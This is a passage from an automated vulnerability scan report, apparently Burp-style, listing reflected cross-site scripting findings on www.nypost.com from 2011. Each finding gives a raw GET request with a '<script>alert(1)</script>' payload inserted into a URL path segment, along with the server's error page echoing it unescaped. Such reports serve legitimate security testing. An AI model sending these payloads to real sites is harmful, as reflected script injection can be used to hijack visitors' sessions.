This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfigd2de8<script>alert(1)</script>4fbf371b36c/WebPortal/nypost/blocks/calendar/calendar.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 713
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:10 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfigd2de8<script>alert(1)</script>4fbf371b36c/WebPortal/nypost/blocks/calendar/calendar.js</p>
...[SNIP]...

1.422. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/calendar/calendar.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/calendar/calendar.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2a89c<script>alert(1)</script>edd1093622d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal2a89c<script>alert(1)</script>edd1093622d/nypost/blocks/calendar/calendar.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 713
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:12 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal2a89c<script>alert(1)</script>edd1093622d/nypost/blocks/calendar/calendar.js</p>
...[SNIP]...

1.423. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/calendar/calendar.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/calendar/calendar.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c98e3<script>alert(1)</script>0177970dcad was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypostc98e3<script>alert(1)</script>0177970dcad/blocks/calendar/calendar.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 713
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:14 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypostc98e3<script>alert(1)</script>0177970dcad/blocks/calendar/calendar.js</p>
...[SNIP]...

1.424. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/calendar/calendar.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/calendar/calendar.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c07b0<script>alert(1)</script>97bc4fd44d2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocksc07b0<script>alert(1)</script>97bc4fd44d2/calendar/calendar.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 713
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:15 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocksc07b0<script>alert(1)</script>97bc4fd44d2/calendar/calendar.js</p>
...[SNIP]...

1.425. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/calendar/calendar.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/calendar/calendar.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 7ab4d<script>alert(1)</script>434d716871f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/calendar7ab4d<script>alert(1)</script>434d716871f/calendar.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 713
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:17 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/calendar7ab4d<script>alert(1)</script>434d716871f/calendar.js</p>
...[SNIP]...

1.426. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/calendar/calendar.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/calendar/calendar.js

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 92231<script>alert(1)</script>ef4eaa13951 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/calendar/calendar.js92231<script>alert(1)</script>ef4eaa13951 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 713
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:19 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/calendar/calendar.js92231<script>alert(1)</script>ef4eaa13951</p>
...[SNIP]...

1.427. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/calendar/ui.datepicker.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/calendar/ui.datepicker.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2aa15<script>alert(1)</script>851eec5067e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig2aa15<script>alert(1)</script>851eec5067e/WebPortal/nypost/blocks/calendar/ui.datepicker.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 718
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:06 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig2aa15<script>alert(1)</script>851eec5067e/WebPortal/nypost/blocks/calendar/ui.datepicker.js</p>
...[SNIP]...

1.428. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/calendar/ui.datepicker.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/calendar/ui.datepicker.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload eff75<script>alert(1)</script>2161f17c1f4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortaleff75<script>alert(1)</script>2161f17c1f4/nypost/blocks/calendar/ui.datepicker.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 718
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:09 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortaleff75<script>alert(1)</script>2161f17c1f4/nypost/blocks/calendar/ui.datepicker.js</p>
...[SNIP]...

1.429. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/calendar/ui.datepicker.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/calendar/ui.datepicker.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 41193<script>alert(1)</script>6f24cdaaf2c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost41193<script>alert(1)</script>6f24cdaaf2c/blocks/calendar/ui.datepicker.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 718
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:10 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost41193<script>alert(1)</script>6f24cdaaf2c/blocks/calendar/ui.datepicker.js</p>
...[SNIP]...

1.430. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/calendar/ui.datepicker.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/calendar/ui.datepicker.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload faf5a<script>alert(1)</script>444e613e4c5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocksfaf5a<script>alert(1)</script>444e613e4c5/calendar/ui.datepicker.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 718
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:12 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocksfaf5a<script>alert(1)</script>444e613e4c5/calendar/ui.datepicker.js</p>
...[SNIP]...

1.431. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/calendar/ui.datepicker.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/calendar/ui.datepicker.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload b837c<script>alert(1)</script>4eb377f240a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/calendarb837c<script>alert(1)</script>4eb377f240a/ui.datepicker.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 718
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:13 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/calendarb837c<script>alert(1)</script>4eb377f240a/ui.datepicker.js</p>
...[SNIP]...

1.432. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/calendar/ui.datepicker.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/calendar/ui.datepicker.js

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload d075d<script>alert(1)</script>0acb7ac2a31 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/calendar/ui.datepicker.jsd075d<script>alert(1)</script>0acb7ac2a31 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 718
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:15 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/calendar/ui.datepicker.jsd075d<script>alert(1)</script>0acb7ac2a31</p>
...[SNIP]...

1.433. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/comments/comments.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/comments/comments.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8f6ab<script>alert(1)</script>5f0fcb1404e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig8f6ab<script>alert(1)</script>5f0fcb1404e/WebPortal/nypost/blocks/comments/comments.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 713
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:23 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig8f6ab<script>alert(1)</script>5f0fcb1404e/WebPortal/nypost/blocks/comments/comments.js</p>
...[SNIP]...

1.434. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/comments/comments.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/comments/comments.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a4c94<script>alert(1)</script>295ff5be0b9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortala4c94<script>alert(1)</script>295ff5be0b9/nypost/blocks/comments/comments.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 713
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:26 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortala4c94<script>alert(1)</script>295ff5be0b9/nypost/blocks/comments/comments.js</p>
...[SNIP]...

1.435. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/comments/comments.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/comments/comments.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload abd35<script>alert(1)</script>284f395086a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypostabd35<script>alert(1)</script>284f395086a/blocks/comments/comments.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 713
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:29 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypostabd35<script>alert(1)</script>284f395086a/blocks/comments/comments.js</p>
...[SNIP]...

1.436. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/comments/comments.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/comments/comments.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload fad71<script>alert(1)</script>155317b13a0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocksfad71<script>alert(1)</script>155317b13a0/comments/comments.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 713
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:31 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocksfad71<script>alert(1)</script>155317b13a0/comments/comments.js</p>
...[SNIP]...

1.437. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/comments/comments.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/comments/comments.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f73f1<script>alert(1)</script>53d123234a5 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/commentsf73f1<script>alert(1)</script>53d123234a5/comments.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 713
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:33 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/commentsf73f1<script>alert(1)</script>53d123234a5/comments.js</p>
...[SNIP]...

1.438. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/comments/comments.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/comments/comments.js

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload b6427<script>alert(1)</script>420bf541f2c was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/comments/comments.jsb6427<script>alert(1)</script>420bf541f2c HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 713
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:36 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/comments/comments.jsb6427<script>alert(1)</script>420bf541f2c</p>
...[SNIP]...

1.439. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1d3a4<script>alert(1)</script>01077d19e02 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig1d3a4<script>alert(1)</script>01077d19e02/WebPortal/nypost/blocks/fat_header/fat_header.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:15 GMT
Connection: close

